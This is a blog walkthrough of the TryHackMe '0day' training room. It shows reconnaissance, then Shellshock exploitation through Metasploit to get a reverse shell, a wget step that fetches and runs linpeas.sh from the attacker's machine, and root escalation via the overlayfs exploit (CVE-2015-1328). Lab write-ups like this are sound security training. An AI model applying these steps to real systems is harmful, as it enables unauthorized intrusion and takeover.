Tryhackme — 0day Walkthrough

Welcome to this writeup for the tryhackme room “0day”. I really enjoyed solving this puzzle!

We start as always with a nmap scan and look for anything interesting.

Figure 1: Full nmap scan

We have ssh on port 22 running (OpenSSH 6.6.1p1 Ubuntu) and an apache webserver on port 80. Using the Firefox extension “Wappalyzer” we can figure out what kind of technology is in play.

Figure 2: Apache Webserver running on http://<ip>:80/, inspecting the contents with Wappalyzer.

We can see that there are some JavaScript functions involved, for example the JavaScript graphics “particles.js” and some other stuff. After inspecting the source code with F12 or rightclick → “view Page Source”, we find something interesting.

Figure 3: Page Source Code of the Webserver.

After googling a bit we came across the so called “Subresource Integrity”, which can be a security risk, but is more of a rabbit hole. Before starting the directory bruteforce, I always check for /robots.txt and well..

Figure 4: The /robots.txt file on the webserver.

He got me with that one, lol. I’m doing the directory bruteforce with gobuster, dirsearch and dirbuster, but I’ll just show the gobuster output because it won’t help at all. I’m using the directory bruteforce (dir) option with the flag -u for the URI, the -w for the wordlist and -t 100 for 100 threads. I want to speed that up a bit after discovering that he’s trolling me, lol.

Figure 5: Directory Bruteforce with gobuster reveals some hidden paths.

We found an interesting directory “/cgi-bin”, keep that in mind for later. Well, I jumped to /admin and /secret first, obviously. The /admin page won’t be displayed, and /secret looks like he wants to troll me again.

Figure 6: The /secret path reveals a turtle.png image without anything else.

I immadiately figured out that is going to be a rabbit hole. Well, we could try some steganography at this point, but I expected far more form 0day as that. Well, I can’t say that the psychological component isn’t important as well. This is the point where I got stuck and looked for any hints. Let’s see what the room itself has to say about it.

Figure 7: Question Hint for the user.txt flag.

I tried a lot of things at this point like searching for “hacking history”, googling some hacker groups containing the “turtle” in name and a lot more. After figuring out that I don’t know anything about turtles, I taked a step back and tried a nikto scan. Don’t neglet that one, it could be painful for you. Nikto is basically a webapp scanner and can be used with the -h flag for “hosts”. Nikto found immadiately some useful informations! If nikto is going to say “I found something interesting”, yeah, than it IS really interesting.

Figure 8: Nikto scan reveals the “shellshock” vulnerability.

We come back to “the history of hacking” with the discovery of the shellshock vulnerability at /cgi-bin/test.cgi. After a bit of Google search, we can figure out that there’s an Metasploit exploit for it. Let’s take it easy and do it with Metasploit. We search for the correct exploit within Metasploit.

Figure 9: Metasploit exploit for the shellshock vulnerability.

We set the RHOST to the machine IP, LHOST to the attacker IP (which I misspelled in first place, so be careful to type “LHOST”), LPORT to some random value like 4444 and really important, the Targeturi to /cgi-bin/test.cgi. That’s how we can exploit the shellshock vulnerability, which is basically a family of security bugs in the Unix Bash shell. For more details about it read this one: What is Shellshock und why does it matter?

Figure 10: Setting up the options in Metasploit.

After running it with “run” (or “exploit” if you wanna feel like a hacker), we get a reverse connection. Trying Metasploit commands like “hashdump” didn’t worked, so I created a shell using the “shell” command.

Figure 11: Starting a shell on the target system.

I used the command (which can be found on https://gtfobins.github.io/ as well):

python -c ‘import pty;pty.spawn(“/bin/bash”)’

To spawn a more stable shell. Now it’s time to privilege escalation. Basically to get a root shell! Sometimes just typing “sudo -l” works, but not in this case. I looked at common places on Unix operating systems like /etc/crontab, /opt/, the home folder /home with /home/.secret and a lot more, but couldn’t find anything useful by myself.

Figure 12: Looking for crontabs and common places to escalate the privileges.

With simply using

uname -a

you can figure out that this is a really old operating system. Or you do it the more complicated way with linpeas.sh like me. To transfer it, use in the directory where linpeas.sh is, the command

python -m SimpleHTTPServer 8000

on your attacker box and on the target box, download and execute it inside the /tmp folder by entering

cd /tmp

wget http://your-kali-ip:8000/linpeas.sh

chmod +x linpeas.sh

./linpeas.sh

We get a yellow PE vector, which means it’s highly possibly that we can use that to escalate our privileges.

Figure 12: linpeas.sh output highlights the version number of the OS.

After googling it, we find some juicy exploits. We used Metasploit before so why not use it again? Exit your current session with Ctrl+C and use

meterpreter > background

to background your current session (you need to remember the session ID later, so write it down. If you haven’t messed up it’s probably ID 1). Now we set up the options, most of it is again the same. Just make sure to choose the correct target id, with typing:

show targets

set target 0

The CVE (target option) we gonna use is CVE-2015–1328. By default, it’ll be target 1. Please change that before continuing.

Figure 13: Using the exploit linux/local/overlayfs_priv_esc with the current meterpreter session.

Now the fun part begins!

Figure 14: Using the Metasploit framework to escalate your privileges.

Now we got a root shell. Collect the flags and finish this!

Figure 15: Finding the flags for the sake of fun.

This was really enjoyable and a funny room! Thanks to 0day for creating this one. If you have any questions about this walkthrough, feel free to contact me at discord; PenTestical#1892.